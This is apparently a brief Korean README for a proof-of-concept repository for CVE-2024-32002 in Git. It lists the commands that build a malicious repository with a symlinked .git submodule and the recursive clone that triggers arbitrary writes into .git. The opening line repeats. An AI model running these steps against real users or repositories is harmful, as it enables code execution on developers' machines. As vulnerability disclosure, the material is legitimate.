
CVE-2024-32002에 대한 PoC로, .git 디렉토리로의 임의 쓰기를 시연합니다.
CVE-2024-32002의 POC로, .git 디렉토리에 임의 쓰기를 시연합니다.
관련 서브모듈 저장소: cve-2024-32002-submodule-aw
.gitmodules 파일.이 저장소는 Linux(WSL2)에서 생성되었습니다. 대소문자를 구분하는 파일 시스템에서만 악의적인 저장소를 생성할 수 있습니다.
ln -s .git submodule
참고:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
참고:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git